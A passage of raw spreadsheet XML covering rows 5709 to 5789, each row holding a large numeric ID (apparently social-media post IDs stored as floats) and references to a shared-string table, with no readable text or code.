        <v>1474</v>
      </c>
    </row>
    <row r="5709" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5709">
        <v>1.2338220707458099E+18</v>
      </c>
      <c r="B5709" t="s">
        <v>14005</v>
      </c>
      <c r="C5709" t="s">
        <v>1</v>
      </c>
      <c r="D5709" t="s">
        <v>14006</v>
      </c>
      <c r="E5709" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="5710" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5710">
        <v>1.2338218187939699E+18</v>
      </c>
      <c r="B5710" t="s">
        <v>14007</v>
      </c>
      <c r="C5710" t="s">
        <v>1</v>
      </c>
      <c r="D5710" t="s">
        <v>14008</v>
      </c>
      <c r="E5710" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="5711" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5711">
        <v>1.2338217935442601E+18</v>
      </c>
      <c r="B5711" t="s">
        <v>14009</v>
      </c>
      <c r="C5711" t="s">
        <v>1</v>
      </c>
      <c r="D5711" t="s">
        <v>14010</v>
      </c>
      <c r="E5711" t="s">
        <v>14011</v>
      </c>
    </row>
    <row r="5712" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5712">
        <v>1.2338214067412201E+18</v>
      </c>
      <c r="B5712" t="s">
        <v>14012</v>
      </c>
      <c r="C5712" t="s">
        <v>1</v>
      </c>
      <c r="D5712" t="s">
        <v>14013</v>
      </c>
      <c r="E5712" t="s">
        <v>14014</v>
      </c>
    </row>
    <row r="5713" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5713">
        <v>1.2338211261171599E+18</v>
      </c>
      <c r="B5713" t="s">
        <v>14015</v>
      </c>
      <c r="C5713" t="s">
        <v>1</v>
      </c>
      <c r="D5713" t="s">
        <v>14016</v>
      </c>
      <c r="E5713" t="s">
        <v>14017</v>
      </c>
    </row>
    <row r="5714" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5714">
        <v>1.2338206963770801E+18</v>
      </c>
      <c r="B5714" t="s">
        <v>14018</v>
      </c>
      <c r="C5714" t="s">
        <v>1</v>
      </c>
      <c r="D5714" t="s">
        <v>14019</v>
      </c>
      <c r="E5714" t="s">
        <v>14020</v>
      </c>
    </row>
    <row r="5715" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5715">
        <v>1.2338204308357299E+18</v>
      </c>
      <c r="B5715" t="s">
        <v>14021</v>
      </c>
      <c r="C5715" t="s">
        <v>1</v>
      </c>
      <c r="D5715" t="s">
        <v>14022</v>
      </c>
      <c r="E5715" t="s">
        <v>14023</v>
      </c>
    </row>
    <row r="5716" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5716">
        <v>1.2338197216082199E+18</v>
      </c>
      <c r="B5716" t="s">
        <v>14024</v>
      </c>
      <c r="C5716" t="s">
        <v>1</v>
      </c>
      <c r="D5716" t="s">
        <v>14025</v>
      </c>
      <c r="E5716" t="s">
        <v>14026</v>
      </c>
    </row>
    <row r="5717" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5717">
        <v>1.2338187688176799E+18</v>
      </c>
      <c r="B5717" t="s">
        <v>14027</v>
      </c>
      <c r="C5717" t="s">
        <v>1</v>
      </c>
      <c r="D5717" t="s">
        <v>14028</v>
      </c>
      <c r="E5717" t="s">
        <v>14029</v>
      </c>
    </row>
    <row r="5718" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5718">
        <v>1.23381852326637E+18</v>
      </c>
      <c r="B5718" t="s">
        <v>14030</v>
      </c>
      <c r="C5718" t="s">
        <v>1</v>
      </c>
      <c r="D5718" t="s">
        <v>14031</v>
      </c>
      <c r="E5718" t="s">
        <v>14032</v>
      </c>
    </row>
    <row r="5719" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5719">
        <v>1.23381808519646E+18</v>
      </c>
      <c r="B5719" t="s">
        <v>14033</v>
      </c>
      <c r="C5719" t="s">
        <v>1</v>
      </c>
      <c r="D5719" t="s">
        <v>10383</v>
      </c>
      <c r="E5719" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="5720" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5720">
        <v>1.2338180037262999E+18</v>
      </c>
      <c r="B5720" t="s">
        <v>14034</v>
      </c>
      <c r="C5720" t="s">
        <v>1</v>
      </c>
      <c r="D5720" t="s">
        <v>5048</v>
      </c>
      <c r="E5720" t="s">
        <v>5049</v>
      </c>
    </row>
    <row r="5721" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5721">
        <v>1.23381673975601E+18</v>
      </c>
      <c r="B5721" t="s">
        <v>14035</v>
      </c>
      <c r="C5721" t="s">
        <v>1</v>
      </c>
      <c r="D5721" t="s">
        <v>14036</v>
      </c>
      <c r="E5721" t="s">
        <v>14037</v>
      </c>
    </row>
    <row r="5722" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5722">
        <v>1.23381634696369E+18</v>
      </c>
      <c r="B5722" t="s">
        <v>14038</v>
      </c>
      <c r="C5722" t="s">
        <v>1</v>
      </c>
      <c r="D5722" t="s">
        <v>14039</v>
      </c>
      <c r="E5722" t="s">
        <v>14040</v>
      </c>
    </row>
    <row r="5723" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5723">
        <v>1.2338163268855099E+18</v>
      </c>
      <c r="B5723" t="s">
        <v>14041</v>
      </c>
      <c r="C5723" t="s">
        <v>1</v>
      </c>
      <c r="D5723" t="s">
        <v>14042</v>
      </c>
      <c r="E5723" t="s">
        <v>14040</v>
      </c>
    </row>
    <row r="5724" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5724">
        <v>1.23381630284797E+18</v>
      </c>
      <c r="B5724" t="s">
        <v>14043</v>
      </c>
      <c r="C5724" t="s">
        <v>1</v>
      </c>
      <c r="D5724" t="s">
        <v>14044</v>
      </c>
      <c r="E5724" t="s">
        <v>14040</v>
      </c>
    </row>
    <row r="5725" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5725">
        <v>1.23381627630639E+18</v>
      </c>
      <c r="B5725" t="s">
        <v>14045</v>
      </c>
      <c r="C5725" t="s">
        <v>1</v>
      </c>
      <c r="D5725" t="s">
        <v>14046</v>
      </c>
      <c r="E5725" t="s">
        <v>14040</v>
      </c>
    </row>
    <row r="5726" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5726">
        <v>1.2338162324508301E+18</v>
      </c>
      <c r="B5726" t="s">
        <v>14047</v>
      </c>
      <c r="C5726" t="s">
        <v>1</v>
      </c>
      <c r="D5726" t="s">
        <v>14048</v>
      </c>
      <c r="E5726" t="s">
        <v>14040</v>
      </c>
    </row>
    <row r="5727" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5727">
        <v>1.2338162098183601E+18</v>
      </c>
      <c r="B5727" t="s">
        <v>14049</v>
      </c>
      <c r="C5727" t="s">
        <v>1</v>
      </c>
      <c r="D5727" t="s">
        <v>14050</v>
      </c>
      <c r="E5727" t="s">
        <v>14040</v>
      </c>
    </row>
    <row r="5728" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5728">
        <v>1.2338161840947E+18</v>
      </c>
      <c r="B5728" t="s">
        <v>14051</v>
      </c>
      <c r="C5728" t="s">
        <v>1</v>
      </c>
      <c r="D5728" t="s">
        <v>14052</v>
      </c>
      <c r="E5728" t="s">
        <v>14040</v>
      </c>
    </row>
    <row r="5729" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5729">
        <v>1.2338144393858099E+18</v>
      </c>
      <c r="B5729" t="s">
        <v>14053</v>
      </c>
      <c r="C5729" t="s">
        <v>1</v>
      </c>
      <c r="D5729" t="s">
        <v>14054</v>
      </c>
      <c r="E5729" t="s">
        <v>14055</v>
      </c>
    </row>
    <row r="5730" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5730">
        <v>1.2338143231867599E+18</v>
      </c>
      <c r="B5730" t="s">
        <v>14056</v>
      </c>
      <c r="C5730" t="s">
        <v>1</v>
      </c>
      <c r="D5730" t="s">
        <v>14057</v>
      </c>
      <c r="E5730" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5731" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5731">
        <v>1.2338143213413E+18</v>
      </c>
      <c r="B5731" t="s">
        <v>14056</v>
      </c>
      <c r="C5731" t="s">
        <v>1</v>
      </c>
      <c r="D5731" t="s">
        <v>14058</v>
      </c>
      <c r="E5731" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5732" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5732">
        <v>1.23381432038925E+18</v>
      </c>
      <c r="B5732" t="s">
        <v>14059</v>
      </c>
      <c r="C5732" t="s">
        <v>1</v>
      </c>
      <c r="D5732" t="s">
        <v>14060</v>
      </c>
      <c r="E5732" t="s">
        <v>2071</v>
      </c>
    </row>
    <row r="5733" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5733">
        <v>1.2338143190093499E+18</v>
      </c>
      <c r="B5733" t="s">
        <v>14059</v>
      </c>
      <c r="C5733" t="s">
        <v>1</v>
      </c>
      <c r="D5733" t="s">
        <v>14061</v>
      </c>
      <c r="E5733" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5734" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5734">
        <v>1.23381425579696E+18</v>
      </c>
      <c r="B5734" t="s">
        <v>14062</v>
      </c>
      <c r="C5734" t="s">
        <v>1</v>
      </c>
      <c r="D5734" t="s">
        <v>14063</v>
      </c>
      <c r="E5734" t="s">
        <v>1659</v>
      </c>
    </row>
    <row r="5735" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5735">
        <v>1.2338142006208499E+18</v>
      </c>
      <c r="B5735" t="s">
        <v>14064</v>
      </c>
      <c r="C5735" t="s">
        <v>1</v>
      </c>
      <c r="D5735" t="s">
        <v>14065</v>
      </c>
      <c r="E5735" t="s">
        <v>1208</v>
      </c>
    </row>
    <row r="5736" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5736">
        <v>1.2338128440068201E+18</v>
      </c>
      <c r="B5736" t="s">
        <v>14066</v>
      </c>
      <c r="C5736" t="s">
        <v>1</v>
      </c>
      <c r="D5736" t="s">
        <v>14067</v>
      </c>
      <c r="E5736" t="s">
        <v>14068</v>
      </c>
    </row>
    <row r="5737" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5737">
        <v>1.23381231801154E+18</v>
      </c>
      <c r="B5737" t="s">
        <v>14069</v>
      </c>
      <c r="C5737" t="s">
        <v>1</v>
      </c>
      <c r="D5737" t="s">
        <v>14070</v>
      </c>
      <c r="E5737" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="5738" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5738">
        <v>1.2338118602410299E+18</v>
      </c>
      <c r="B5738" t="s">
        <v>14071</v>
      </c>
      <c r="C5738" t="s">
        <v>1</v>
      </c>
      <c r="D5738" t="s">
        <v>14072</v>
      </c>
      <c r="E5738" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="5739" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5739">
        <v>1.23381131026304E+18</v>
      </c>
      <c r="B5739" t="s">
        <v>14073</v>
      </c>
      <c r="C5739" t="s">
        <v>1</v>
      </c>
      <c r="D5739" t="s">
        <v>14074</v>
      </c>
      <c r="E5739" t="s">
        <v>3116</v>
      </c>
    </row>
    <row r="5740" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5740">
        <v>1.2338111797699E+18</v>
      </c>
      <c r="B5740" t="s">
        <v>14075</v>
      </c>
      <c r="C5740" t="s">
        <v>1</v>
      </c>
      <c r="D5740" t="s">
        <v>14076</v>
      </c>
      <c r="E5740" t="s">
        <v>14077</v>
      </c>
    </row>
    <row r="5741" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5741">
        <v>1.2338100739624699E+18</v>
      </c>
      <c r="B5741" t="s">
        <v>14078</v>
      </c>
      <c r="C5741" t="s">
        <v>1</v>
      </c>
      <c r="D5741" t="s">
        <v>14079</v>
      </c>
      <c r="E5741" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="5742" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5742">
        <v>1.23380949106337E+18</v>
      </c>
      <c r="B5742" t="s">
        <v>14080</v>
      </c>
      <c r="C5742" t="s">
        <v>1</v>
      </c>
      <c r="D5742" t="s">
        <v>14081</v>
      </c>
      <c r="E5742" t="s">
        <v>14082</v>
      </c>
    </row>
    <row r="5743" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5743">
        <v>1.23380924544913E+18</v>
      </c>
      <c r="B5743" t="s">
        <v>14083</v>
      </c>
      <c r="C5743" t="s">
        <v>1</v>
      </c>
      <c r="D5743" t="s">
        <v>14084</v>
      </c>
      <c r="E5743" t="s">
        <v>14085</v>
      </c>
    </row>
    <row r="5744" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5744">
        <v>1.2338089520072801E+18</v>
      </c>
      <c r="B5744" t="s">
        <v>14086</v>
      </c>
      <c r="C5744" t="s">
        <v>1</v>
      </c>
      <c r="D5744" t="s">
        <v>14087</v>
      </c>
      <c r="E5744" t="s">
        <v>14088</v>
      </c>
    </row>
    <row r="5745" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5745">
        <v>1.23380859393107E+18</v>
      </c>
      <c r="B5745" t="s">
        <v>14089</v>
      </c>
      <c r="C5745" t="s">
        <v>1</v>
      </c>
      <c r="D5745" t="s">
        <v>14090</v>
      </c>
      <c r="E5745" t="s">
        <v>5121</v>
      </c>
    </row>
    <row r="5746" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5746">
        <v>1.2338085899758799E+18</v>
      </c>
      <c r="B5746" t="s">
        <v>14091</v>
      </c>
      <c r="C5746" t="s">
        <v>1</v>
      </c>
      <c r="D5746" t="s">
        <v>14092</v>
      </c>
      <c r="E5746" t="s">
        <v>4425</v>
      </c>
    </row>
    <row r="5747" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5747">
        <v>1.23380848998783E+18</v>
      </c>
      <c r="B5747" t="s">
        <v>14093</v>
      </c>
      <c r="C5747" t="s">
        <v>1</v>
      </c>
      <c r="D5747" t="s">
        <v>14094</v>
      </c>
      <c r="E5747" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="5748" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5748">
        <v>1.2338083586221299E+18</v>
      </c>
      <c r="B5748" t="s">
        <v>14095</v>
      </c>
      <c r="C5748" t="s">
        <v>1</v>
      </c>
      <c r="D5748" t="s">
        <v>14096</v>
      </c>
      <c r="E5748" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="5749" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5749">
        <v>1.23380829807314E+18</v>
      </c>
      <c r="B5749" t="s">
        <v>14097</v>
      </c>
      <c r="C5749" t="s">
        <v>1</v>
      </c>
      <c r="D5749" t="s">
        <v>14098</v>
      </c>
      <c r="E5749" t="s">
        <v>5242</v>
      </c>
    </row>
    <row r="5750" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5750">
        <v>1.2338081657514399E+18</v>
      </c>
      <c r="B5750" t="s">
        <v>14099</v>
      </c>
      <c r="C5750" t="s">
        <v>1</v>
      </c>
      <c r="D5750" t="s">
        <v>14100</v>
      </c>
      <c r="E5750" t="s">
        <v>8635</v>
      </c>
    </row>
    <row r="5751" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5751">
        <v>1.2338078815328399E+18</v>
      </c>
      <c r="B5751" t="s">
        <v>14101</v>
      </c>
      <c r="C5751" t="s">
        <v>1</v>
      </c>
      <c r="D5751" t="s">
        <v>14102</v>
      </c>
      <c r="E5751" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5752" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5752">
        <v>1.2338077645702999E+18</v>
      </c>
      <c r="B5752" t="s">
        <v>14103</v>
      </c>
      <c r="C5752" t="s">
        <v>1</v>
      </c>
      <c r="D5752" t="s">
        <v>14104</v>
      </c>
      <c r="E5752" t="s">
        <v>14105</v>
      </c>
    </row>
    <row r="5753" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5753">
        <v>1.23380775054047E+18</v>
      </c>
      <c r="B5753" t="s">
        <v>14106</v>
      </c>
      <c r="C5753" t="s">
        <v>1</v>
      </c>
      <c r="D5753" t="s">
        <v>14107</v>
      </c>
      <c r="E5753" t="s">
        <v>2629</v>
      </c>
    </row>
    <row r="5754" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5754">
        <v>1.2338077070330099E+18</v>
      </c>
      <c r="B5754" t="s">
        <v>14108</v>
      </c>
      <c r="C5754" t="s">
        <v>1</v>
      </c>
      <c r="D5754" t="s">
        <v>14109</v>
      </c>
      <c r="E5754" t="s">
        <v>14110</v>
      </c>
    </row>
    <row r="5755" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5755">
        <v>1.2338076668052301E+18</v>
      </c>
      <c r="B5755" t="s">
        <v>14111</v>
      </c>
      <c r="C5755" t="s">
        <v>1</v>
      </c>
      <c r="D5755" t="s">
        <v>14112</v>
      </c>
      <c r="E5755" t="s">
        <v>13764</v>
      </c>
    </row>
    <row r="5756" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5756">
        <v>1.2338076609879601E+18</v>
      </c>
      <c r="B5756" t="s">
        <v>14113</v>
      </c>
      <c r="C5756" t="s">
        <v>1</v>
      </c>
      <c r="D5756" t="s">
        <v>5098</v>
      </c>
      <c r="E5756" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="5757" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5757">
        <v>1.2338075936398999E+18</v>
      </c>
      <c r="B5757" t="s">
        <v>14114</v>
      </c>
      <c r="C5757" t="s">
        <v>1</v>
      </c>
      <c r="D5757" t="s">
        <v>14115</v>
      </c>
      <c r="E5757" t="s">
        <v>14116</v>
      </c>
    </row>
    <row r="5758" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5758">
        <v>1.2338056357263099E+18</v>
      </c>
      <c r="B5758" t="s">
        <v>14117</v>
      </c>
      <c r="C5758" t="s">
        <v>1</v>
      </c>
      <c r="D5758" t="s">
        <v>14118</v>
      </c>
      <c r="E5758" t="s">
        <v>14119</v>
      </c>
    </row>
    <row r="5759" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5759">
        <v>1.2338050621971899E+18</v>
      </c>
      <c r="B5759" t="s">
        <v>14120</v>
      </c>
      <c r="C5759" t="s">
        <v>1</v>
      </c>
      <c r="D5759" t="s">
        <v>14121</v>
      </c>
      <c r="E5759" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="5760" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5760">
        <v>1.23380410342125E+18</v>
      </c>
      <c r="B5760" t="s">
        <v>14122</v>
      </c>
      <c r="C5760" t="s">
        <v>1</v>
      </c>
      <c r="D5760" t="s">
        <v>14123</v>
      </c>
      <c r="E5760" t="s">
        <v>14124</v>
      </c>
    </row>
    <row r="5761" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5761">
        <v>1.2338021573184699E+18</v>
      </c>
      <c r="B5761" t="s">
        <v>14125</v>
      </c>
      <c r="C5761" t="s">
        <v>1</v>
      </c>
      <c r="D5761" t="s">
        <v>14126</v>
      </c>
      <c r="E5761" t="s">
        <v>14127</v>
      </c>
    </row>
    <row r="5762" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5762">
        <v>1.2338021108876101E+18</v>
      </c>
      <c r="B5762" t="s">
        <v>14128</v>
      </c>
      <c r="C5762" t="s">
        <v>1</v>
      </c>
      <c r="D5762" t="s">
        <v>14129</v>
      </c>
      <c r="E5762" t="s">
        <v>14130</v>
      </c>
    </row>
    <row r="5763" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5763">
        <v>1.23380136021629E+18</v>
      </c>
      <c r="B5763" t="s">
        <v>14131</v>
      </c>
      <c r="C5763" t="s">
        <v>1</v>
      </c>
      <c r="D5763" t="s">
        <v>14132</v>
      </c>
      <c r="E5763" t="s">
        <v>14133</v>
      </c>
    </row>
    <row r="5764" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5764">
        <v>1.2338006269220301E+18</v>
      </c>
      <c r="B5764" t="s">
        <v>14134</v>
      </c>
      <c r="C5764" t="s">
        <v>1</v>
      </c>
      <c r="D5764" t="s">
        <v>14135</v>
      </c>
      <c r="E5764" t="s">
        <v>14136</v>
      </c>
    </row>
    <row r="5765" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5765">
        <v>1.2338003794622999E+18</v>
      </c>
      <c r="B5765" t="s">
        <v>14137</v>
      </c>
      <c r="C5765" t="s">
        <v>1</v>
      </c>
      <c r="D5765" t="s">
        <v>14138</v>
      </c>
      <c r="E5765" t="s">
        <v>14139</v>
      </c>
    </row>
    <row r="5766" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5766">
        <v>1.2338003591618401E+18</v>
      </c>
      <c r="B5766" t="s">
        <v>14140</v>
      </c>
      <c r="C5766" t="s">
        <v>1</v>
      </c>
      <c r="D5766" t="s">
        <v>14141</v>
      </c>
      <c r="E5766" t="s">
        <v>12698</v>
      </c>
    </row>
    <row r="5767" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5767">
        <v>1.23379936267074E+18</v>
      </c>
      <c r="B5767" t="s">
        <v>14142</v>
      </c>
      <c r="C5767" t="s">
        <v>1</v>
      </c>
      <c r="D5767" t="s">
        <v>14143</v>
      </c>
      <c r="E5767" t="s">
        <v>6340</v>
      </c>
    </row>
    <row r="5768" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5768">
        <v>1.23379914755328E+18</v>
      </c>
      <c r="B5768" t="s">
        <v>14144</v>
      </c>
      <c r="C5768" t="s">
        <v>1</v>
      </c>
      <c r="D5768" t="s">
        <v>14145</v>
      </c>
      <c r="E5768" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="5769" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5769">
        <v>1.23379897205501E+18</v>
      </c>
      <c r="B5769" t="s">
        <v>14146</v>
      </c>
      <c r="C5769" t="s">
        <v>1</v>
      </c>
      <c r="D5769" t="s">
        <v>14147</v>
      </c>
      <c r="E5769" t="s">
        <v>2343</v>
      </c>
    </row>
    <row r="5770" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5770">
        <v>1.23379886123731E+18</v>
      </c>
      <c r="B5770" t="s">
        <v>14148</v>
      </c>
      <c r="C5770" t="s">
        <v>1</v>
      </c>
      <c r="D5770" t="s">
        <v>14149</v>
      </c>
      <c r="E5770" t="s">
        <v>14150</v>
      </c>
    </row>
    <row r="5771" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5771">
        <v>1.2337987147764101E+18</v>
      </c>
      <c r="B5771" t="s">
        <v>14151</v>
      </c>
      <c r="C5771" t="s">
        <v>1</v>
      </c>
      <c r="D5771" t="s">
        <v>14152</v>
      </c>
      <c r="E5771" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="5772" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5772">
        <v>1.2337985108115699E+18</v>
      </c>
      <c r="B5772" t="s">
        <v>14153</v>
      </c>
      <c r="C5772" t="s">
        <v>1</v>
      </c>
      <c r="D5772" t="s">
        <v>14154</v>
      </c>
      <c r="E5772" t="s">
        <v>14155</v>
      </c>
    </row>
    <row r="5773" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5773">
        <v>1.2337968877251799E+18</v>
      </c>
      <c r="B5773" t="s">
        <v>14156</v>
      </c>
      <c r="C5773" t="s">
        <v>1</v>
      </c>
      <c r="D5773" t="s">
        <v>14157</v>
      </c>
      <c r="E5773" t="s">
        <v>14158</v>
      </c>
    </row>
    <row r="5774" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5774">
        <v>1.23379657840354E+18</v>
      </c>
      <c r="B5774" t="s">
        <v>14159</v>
      </c>
      <c r="C5774" t="s">
        <v>1</v>
      </c>
      <c r="D5774" t="s">
        <v>14160</v>
      </c>
      <c r="E5774" t="s">
        <v>14161</v>
      </c>
    </row>
    <row r="5775" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5775">
        <v>1.23379557884222E+18</v>
      </c>
      <c r="B5775" t="s">
        <v>14162</v>
      </c>
      <c r="C5775" t="s">
        <v>1</v>
      </c>
      <c r="D5775" t="s">
        <v>2186</v>
      </c>
      <c r="E5775" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="5776" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5776">
        <v>1.2337955739265101E+18</v>
      </c>
      <c r="B5776" t="s">
        <v>14163</v>
      </c>
      <c r="C5776" t="s">
        <v>1</v>
      </c>
      <c r="D5776" t="s">
        <v>14164</v>
      </c>
      <c r="E5776" t="s">
        <v>14165</v>
      </c>
    </row>
    <row r="5777" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5777">
        <v>1.2337953433446799E+18</v>
      </c>
      <c r="B5777" t="s">
        <v>14166</v>
      </c>
      <c r="C5777" t="s">
        <v>1</v>
      </c>
      <c r="D5777" t="s">
        <v>14167</v>
      </c>
      <c r="E5777" t="s">
        <v>14168</v>
      </c>
    </row>
    <row r="5778" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5778">
        <v>1.2337948410054799E+18</v>
      </c>
      <c r="B5778" t="s">
        <v>14169</v>
      </c>
      <c r="C5778" t="s">
        <v>1</v>
      </c>
      <c r="D5778" t="s">
        <v>14170</v>
      </c>
      <c r="E5778" t="s">
        <v>8204</v>
      </c>
    </row>
    <row r="5779" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5779">
        <v>1.23379378365075E+18</v>
      </c>
      <c r="B5779" t="s">
        <v>14171</v>
      </c>
      <c r="C5779" t="s">
        <v>1</v>
      </c>
      <c r="D5779" t="s">
        <v>14172</v>
      </c>
      <c r="E5779" t="s">
        <v>1568</v>
      </c>
    </row>
    <row r="5780" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5780">
        <v>1.2337933908919301E+18</v>
      </c>
      <c r="B5780" t="s">
        <v>14173</v>
      </c>
      <c r="C5780" t="s">
        <v>1</v>
      </c>
      <c r="D5780" t="s">
        <v>14174</v>
      </c>
      <c r="E5780" t="s">
        <v>14175</v>
      </c>
    </row>
    <row r="5781" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5781">
        <v>1.23379271381807E+18</v>
      </c>
      <c r="B5781" t="s">
        <v>14176</v>
      </c>
      <c r="C5781" t="s">
        <v>1</v>
      </c>
      <c r="D5781" t="s">
        <v>14177</v>
      </c>
      <c r="E5781" t="s">
        <v>1816</v>
      </c>
    </row>
    <row r="5782" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5782">
        <v>1.23379178371857E+18</v>
      </c>
      <c r="B5782" t="s">
        <v>14178</v>
      </c>
      <c r="C5782" t="s">
        <v>1</v>
      </c>
      <c r="D5782" t="s">
        <v>14179</v>
      </c>
      <c r="E5782" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="5783" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5783">
        <v>1.23379153141856E+18</v>
      </c>
      <c r="B5783" t="s">
        <v>14180</v>
      </c>
      <c r="C5783" t="s">
        <v>1</v>
      </c>
      <c r="D5783" t="s">
        <v>14181</v>
      </c>
      <c r="E5783" t="s">
        <v>14182</v>
      </c>
    </row>
    <row r="5784" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5784">
        <v>1.2337907464671501E+18</v>
      </c>
      <c r="B5784" t="s">
        <v>14183</v>
      </c>
      <c r="C5784" t="s">
        <v>1</v>
      </c>
      <c r="D5784" t="s">
        <v>14184</v>
      </c>
      <c r="E5784" t="s">
        <v>891</v>
      </c>
    </row>
    <row r="5785" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5785">
        <v>1.23379029906499E+18</v>
      </c>
      <c r="B5785" t="s">
        <v>14185</v>
      </c>
      <c r="C5785" t="s">
        <v>1</v>
      </c>
      <c r="D5785" t="s">
        <v>14186</v>
      </c>
      <c r="E5785" t="s">
        <v>7808</v>
      </c>
    </row>
    <row r="5786" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5786">
        <v>1.23378958089523E+18</v>
      </c>
      <c r="B5786" t="s">
        <v>14187</v>
      </c>
      <c r="C5786" t="s">
        <v>1</v>
      </c>
      <c r="D5786" t="s">
        <v>14188</v>
      </c>
      <c r="E5786" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="5787" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5787">
        <v>1.23378947616765E+18</v>
      </c>
      <c r="B5787" t="s">
        <v>14189</v>
      </c>
      <c r="C5787" t="s">
        <v>1</v>
      </c>
      <c r="D5787" t="s">
        <v>14190</v>
      </c>
      <c r="E5787" t="s">
        <v>14191</v>
      </c>
    </row>
    <row r="5788" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5788">
        <v>1.23378912575857E+18</v>
      </c>
      <c r="B5788" t="s">
        <v>14192</v>
      </c>
      <c r="C5788" t="s">
        <v>1</v>
      </c>
      <c r="D5788" t="s">
        <v>14193</v>
      </c>
      <c r="E5788" t="s">
        <v>14194</v>
      </c>
    </row>
    <row r="5789" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5789">
        <v>1.2337859591766001E+18</v>
      </c>
      <c r="B5789" t="s">
        <v>14195</v>
      </c>
      <c r="C5789" t="s">
        <v>1</v>
      </c>
      <c r="D5789" t="s">
        <v>14196</v>
      </c>
      <c r="E5789" t="s">
        <v>14197</v>
      </c>
    </row>
    <row r="5790" spans="1:5" x14ac:dyDescent="0.25">
